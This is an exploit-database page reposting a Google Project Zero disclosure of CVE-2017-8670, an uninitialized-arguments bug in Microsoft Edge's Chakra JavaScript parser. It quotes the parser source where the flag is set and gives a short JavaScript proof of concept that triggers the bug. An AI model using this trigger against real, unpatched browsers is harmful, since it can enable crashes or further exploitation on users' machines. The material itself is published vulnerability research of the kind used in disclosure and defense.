[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Microsoft Edge Chakra - Uninitialized Arguments (2) Exploit

Author
Google Security Research
Risk
[
Security Risk High
]
0day-ID
0day-ID-28295
Category
dos / poc
Date add
17-08-2017
CVE
CVE-2017-8670
Platform
windows
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1298
 
Similar to the  issue #1297 . But this time, it happends in "Parser::ParseFncFormals" with the "PNodeFlags::fpnArguments_overriddenInParam" flag.
 
template<bool buildAST>
void Parser::ParseFncFormals(ParseNodePtr pnodeFnc, ParseNodePtr pnodeParentFnc, ushort flags)
{
    ...
    if (IsES6DestructuringEnabled() && IsPossiblePatternStart())
    {
        ...
        // Instead of passing the STFormal all the way on many methods, it seems it is better to change the symbol type afterward.
        for (ParseNodePtr lexNode = *ppNodeLex; lexNode != nullptr; lexNode = lexNode->sxVar.pnodeNext)
        {
            Assert(lexNode->IsVarLetOrConst());
            UpdateOrCheckForDuplicateInFormals(lexNode->sxVar.pid, &formals);
            lexNode->sxVar.sym->SetSymbolType(STFormal);
            if (m_currentNodeFunc != nullptr && lexNode->sxVar.pid == wellKnownPropertyPids.arguments)
            {
                m_currentNodeFunc->grfpn |= PNodeFlags::fpnArguments_overriddenInParam;  <<------ HERE
            }
        }
        ...
    ...
}
 
PoC:
-->
 
function f() {
    ({a = ([arguments]) => {
    }} = 1);
 
    arguments.x;
}
 
f();

#  0day.today [2024-12-26]  #